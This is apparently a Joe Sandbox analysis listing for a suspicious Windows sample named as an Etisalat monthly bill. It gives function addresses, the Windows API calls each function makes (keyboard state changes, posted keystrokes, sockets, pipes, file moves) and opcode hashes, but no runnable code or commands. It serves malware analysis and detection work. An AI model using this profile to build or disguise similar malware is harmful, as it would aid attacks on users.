Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 19d46d7126b238998742a810c737565e07ac76f4094d3ac1b89885c1d6997825
Instruction ID: 7a97a0cdad1547d72d24ba2d1db967a848fdca00dc919a81152814e6ee0d9ab5
Opcode Fuzzy Hash: 19d46d7126b238998742a810c737565e07ac76f4094d3ac1b89885c1d6997825
Instruction Fuzzy Hash: 4F718D75A04205AFCB14EFA8C845AAEB7F5FF88310F148459E926EB351DB34ED418F91

Function 0090AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0090AEF9
GetKeyboardState.USER32(?), ref: 0090AF0E
SetKeyboardState.USER32(?), ref: 0090AF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 0090AF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 0090AFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 0090AFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 0090B020

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 66b70c2b0d6060f177735edf987cefbcc7c4389c60329d6898677dcb46569216
Instruction ID: 9e8447affd63301ca68c93c6a823eef2ea95f38e2033d43e4ee8ae6fe45b14d1
Opcode Fuzzy Hash: 66b70c2b0d6060f177735edf987cefbcc7c4389c60329d6898677dcb46569216
Instruction Fuzzy Hash: 7551A3A16187D63DFB368334CC45BBA7EED5B06304F088589E2E9954C2D399ACC4D791

Function 0090ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0090AD19
GetKeyboardState.USER32(?), ref: 0090AD2E
SetKeyboardState.USER32(?), ref: 0090AD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0090ADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0090ADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0090AE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0090AE38

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 5b958e3fed8ed948b3d007ec66c7034297a9bf5d3ab7df222d08670f95b802c9
Instruction ID: 4e063f510990057ce7a305ddfc82b1bf66880aaabc32894cf4524e19fe152175
Opcode Fuzzy Hash: 5b958e3fed8ed948b3d007ec66c7034297a9bf5d3ab7df222d08670f95b802c9
Instruction Fuzzy Hash: 5451E5A15187D53DFB378334CC55BBABEED5B46304F088489E1D5568C3D294EC88E7A2

Function 008D542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(008E3CD6,?,?,?,?,?,?,?,?,008D5BA3,?,?,008E3CD6,?,?), ref: 008D5470
__fassign.LIBCMT ref: 008D54EB
__fassign.LIBCMT ref: 008D5506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,008E3CD6,00000005,00000000,00000000), ref: 008D552C
WriteFile.KERNEL32(?,008E3CD6,00000000,008D5BA3,00000000,?,?,?,?,?,?,?,?,?,008D5BA3,?), ref: 008D554B
WriteFile.KERNEL32(?,?,00000001,008D5BA3,00000000,?,?,?,?,?,?,?,?,?,008D5BA3,?), ref: 008D5584

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 8a4d0b8e6d48dc1e60498e4d1f70b679df5823e0bbd1daf822f134f749ffd0a1
Instruction ID: b9bfa717adce3c295e551f0d8cbb3416b13c5510b32de90aac5720b50ae5063b
Opcode Fuzzy Hash: 8a4d0b8e6d48dc1e60498e4d1f70b679df5823e0bbd1daf822f134f749ffd0a1
Instruction Fuzzy Hash: CD51C0B1A00649AFDB11DFA8E851AEEBBF9FF09300F14421BF555E7391D6309A81CB61

Function 008C2D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 008C2D4B
___except_validate_context_record.LIBVCRUNTIME ref: 008C2D53
_ValidateLocalCookies.LIBCMT ref: 008C2DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 008C2E0C
_ValidateLocalCookies.LIBCMT ref: 008C2E61

Strings

csm, xrefs: 008C2DF6

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 3185bc61a9ef155b7f9a593442c09ebcde96c1a145a1db18b7802f026dc7097c
Instruction ID: 16ac0fcfadccf3bd39fab9ff9e8c8e638127fcbe3ffab34f00e41e9a5a8a58a4
Opcode Fuzzy Hash: 3185bc61a9ef155b7f9a593442c09ebcde96c1a145a1db18b7802f026dc7097c
Instruction Fuzzy Hash: B4417134A0020DABCF10DF68C845F9EBBB5FF55328F148169E915EB292D731DA15CB91

Function 009210B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0092304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0092307A
Part of subcall function 0092304E: _wcslen.LIBCMT ref: 0092309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00921112
WSAGetLastError.WSOCK32 ref: 00921121
WSAGetLastError.WSOCK32 ref: 009211C9
closesocket.WSOCK32(00000000), ref: 009211F9

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 5749d12a9ca97160111a0212eda0ea5ad28e0d71ab25cebfb42559270ee1889e
Instruction ID: 58265cc49db3e7b05b84c77d5e0ac4fe0d4498bfd4bde41d8a7f6816266d38c4
Opcode Fuzzy Hash: 5749d12a9ca97160111a0212eda0ea5ad28e0d71ab25cebfb42559270ee1889e
Instruction Fuzzy Hash: 4C413531604614AFEB109F24D884BAAB7E9FF41324F148019FD06AB296C774EE51CFE1

Function 0090CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0090DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0090CF22,?), ref: 0090DDFD

Part of subcall function 0090DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0090CF22,?), ref: 0090DE16

lstrcmpiW.KERNEL32(?,?), ref: 0090CF45
MoveFileW.KERNEL32(?,?), ref: 0090CF7F
_wcslen.LIBCMT ref: 0090D005
_wcslen.LIBCMT ref: 0090D01B
SHFileOperationW.SHELL32(?), ref: 0090D061

Strings

\*.*, xrefs: 0090CFF3

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: c9f639ae3a4e004ce13d8ace4e81713c5b57f6a627f09bd42a120da5bff8ade9
Instruction ID: 9112c55064bdb5831fd2a176ae091b446794a2c397ccd1d79dbf96893d9fdfb8
Opcode Fuzzy Hash: c9f639ae3a4e004ce13d8ace4e81713c5b57f6a627f09bd42a120da5bff8ade9
Instruction Fuzzy Hash: 6F4158B19052199FDF12EBA4D981FDE77BDEF48380F0000E6E505E7181EA34A688CB51

Function 00932DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00932E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 00932E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 00932E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00932EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00932EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 00932EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00932F0B

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: e3183c47b1fda7f3f710f927ce80477e601c9a9f37a9f39321a773dc89982025
Instruction ID: b34bb9fd98b045c93153439122c0c331f1a7a4a5afcf05abd1f32ff512d9b292
Opcode Fuzzy Hash: e3183c47b1fda7f3f710f927ce80477e601c9a9f37a9f39321a773dc89982025
Instruction Fuzzy Hash: B3310435618251AFDB21CF58EC86F6537E9FB8AB10F150164FA059F2B1CB71A881EF41

Function 00907726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00907769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0090778F
SysAllocString.OLEAUT32(00000000), ref: 00907792
SysAllocString.OLEAUT32(?), ref: 009077B0
SysFreeString.OLEAUT32(?), ref: 009077B9
StringFromGUID2.OLE32(?,?,00000028), ref: 009077DE
SysAllocString.OLEAUT32(?), ref: 009077EC

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 9cfa6c7e20d6b8e0f5bfb25add02dbbed7202a0398f9ea884df1f8953a312110
Instruction ID: e655ef5a0b02080980439a9249e04a1a24cd8e727492d433003a2d9d03437bb2
Opcode Fuzzy Hash: 9cfa6c7e20d6b8e0f5bfb25add02dbbed7202a0398f9ea884df1f8953a312110
Instruction Fuzzy Hash: 91219576A08219AFDB10DFE8CC88CBB77ACEF097A47048425FA15DB1A1D674ED419B60

Function 009077FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00907842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00907868
SysAllocString.OLEAUT32(00000000), ref: 0090786B
SysAllocString.OLEAUT32 ref: 0090788C
SysFreeString.OLEAUT32 ref: 00907895
StringFromGUID2.OLE32(?,?,00000028), ref: 009078AF
SysAllocString.OLEAUT32(?), ref: 009078BD

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: b195495b6fb9e6c8991990eedfa0ecc243f0eca9174422dd71b0438a85ffdd55
Instruction ID: c99884cc0357ffb41dea9258ab48561c98ab7e43db112f3d6926297ae3410023
Opcode Fuzzy Hash: b195495b6fb9e6c8991990eedfa0ecc243f0eca9174422dd71b0438a85ffdd55
Instruction Fuzzy Hash: 5F216072A08204AFDB109FE8DC8CDBAB7ECEB097607108125FA15DB2A1D674EC41DB64

Function 009104D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 009104F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0091052E

Strings

nul, xrefs: 00910567

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: de4f728ee910785ad08e49a27e75c7524f07f345aaff24610e7e2e72ef78067e
Instruction ID: 2cf62fc4dc2ad37bdd084c3dbb104bcb81f7dece043f5daea9516f1ec1238aef
Opcode Fuzzy Hash: de4f728ee910785ad08e49a27e75c7524f07f345aaff24610e7e2e72ef78067e
Instruction Fuzzy Hash: D32162756003099BDB209F6ADC44ADA77A9BF84764F204A19F8A1E71E0D7B1D9D0DF20

Function 009105A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 009105C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00910601

Strings

nul, xrefs: 00910639

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: a8294001731fb9783765db8c109af9112ab5079907ba86aa7747841013447272
Instruction ID: 12d0ab1cec275e94c5d68ab7303fee74ab7fbf312d32ae26b99d35a696d8100e
Opcode Fuzzy Hash: a8294001731fb9783765db8c109af9112ab5079907ba86aa7747841013447272
Instruction Fuzzy Hash: 962183756003099BDB209F698C04ADA77E8AFD5760F200B19F8A1E72D0D7F198E0DB10

Function 009340AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008A600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 008A604C
Part of subcall function 008A600E: GetStockObject.GDI32(00000011), ref: 008A6060
Part of subcall function 008A600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 008A606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00934112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0093411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0093412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00934139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00934145

Strings

Msctls_Progress32, xrefs: 009340E3

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 59d3e1d2d5472a6c862c4c04f85069761e069af727e3842e903ca791c9656fe0
Instruction ID: 0a80679e3b4fd37297b8e427061e15ced885f712b7e72a3be0a7fe2cb57f23ad
Opcode Fuzzy Hash: 59d3e1d2d5472a6c862c4c04f85069761e069af727e3842e903ca791c9656fe0
Instruction Fuzzy Hash: B611B2B2150219BFEF118FA4CC86EE77F5DEF18798F014111FA18A2050CA769C61DBA4

Function 008DD7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 008DD7A3: _free.LIBCMT ref: 008DD7CC

_free.LIBCMT ref: 008DD82D

Part of subcall function 008D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,008DD7D1,00000000,00000000,00000000,00000000,?,008DD7F8,00000000,00000007,00000000,?,008DDBF5,00000000), ref: 008D29DE
Part of subcall function 008D29C8: GetLastError.KERNEL32(00000000,?,008DD7D1,00000000,00000000,00000000,00000000,?,008DD7F8,00000000,00000007,00000000,?,008DDBF5,00000000,00000000), ref: 008D29F0

_free.LIBCMT ref: 008DD838
_free.LIBCMT ref: 008DD843
_free.LIBCMT ref: 008DD897
_free.LIBCMT ref: 008DD8A2
_free.LIBCMT ref: 008DD8AD
_free.LIBCMT ref: 008DD8B8

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
Instruction ID: e6cdbbff83eb11a25ee886b417784282e7000e848ce1d81f7d3e9c1ea1d72b58
Opcode Fuzzy Hash: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
Instruction Fuzzy Hash: E2115E71540B04BAD621BFB9CC47FCB7BDCFF10700F400A26B29DE6292DA65B5059662

Function 0090DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0090DA74
LoadStringW.USER32(00000000), ref: 0090DA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0090DA91
LoadStringW.USER32(00000000), ref: 0090DA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0090DADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0090DAB9

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 512bc596009a64a07dac8900482f791e4ba7b588290e03679ef717d2649ae760
Instruction ID: c5b4ec7118f656f08c0adb792391bba7f86767128eaa0d8aba45273c4bceef42
Opcode Fuzzy Hash: 512bc596009a64a07dac8900482f791e4ba7b588290e03679ef717d2649ae760
Instruction Fuzzy Hash: 450186F25042087FE7109BE09D89EEB336CE708305F400895B746F2081EA749E845F74

Function 0091096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(0124E988,0124E988), ref: 0091097B
EnterCriticalSection.KERNEL32(0124E968,00000000), ref: 0091098D
TerminateThread.KERNEL32(454D414E,000001F6), ref: 0091099B
WaitForSingleObject.KERNEL32(454D414E,000003E8), ref: 009109A9
CloseHandle.KERNEL32(454D414E), ref: 009109B8
InterlockedExchange.KERNEL32(0124E988,000001F6), ref: 009109C8
LeaveCriticalSection.KERNEL32(0124E968), ref: 009109CF

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 94e93e376c0f4693f16c99a78cba30d7c07d69b6f75822a68c7a4c8948ab2181
Instruction ID: 9147b1c1a85f465a84c9835cb082bfa767090baffdeeecf4bdc0a21c38386735
Opcode Fuzzy Hash: 94e93e376c0f4693f16c99a78cba30d7c07d69b6f75822a68c7a4c8948ab2181
Instruction Fuzzy Hash: D2F03171556902BBD7415F94EE8CBD67B39FF45702F401015F101608A1C7B5D4B5DF90

Function 00921C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00921DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00921DE1
WSAGetLastError.WSOCK32 ref: 00921DF2
htons.WSOCK32(?,?,?,?,?), ref: 00921EDB
inet_ntoa.WSOCK32(?), ref: 00921E8C

Part of subcall function 009039E8: _strlen.LIBCMT ref: 009039F2

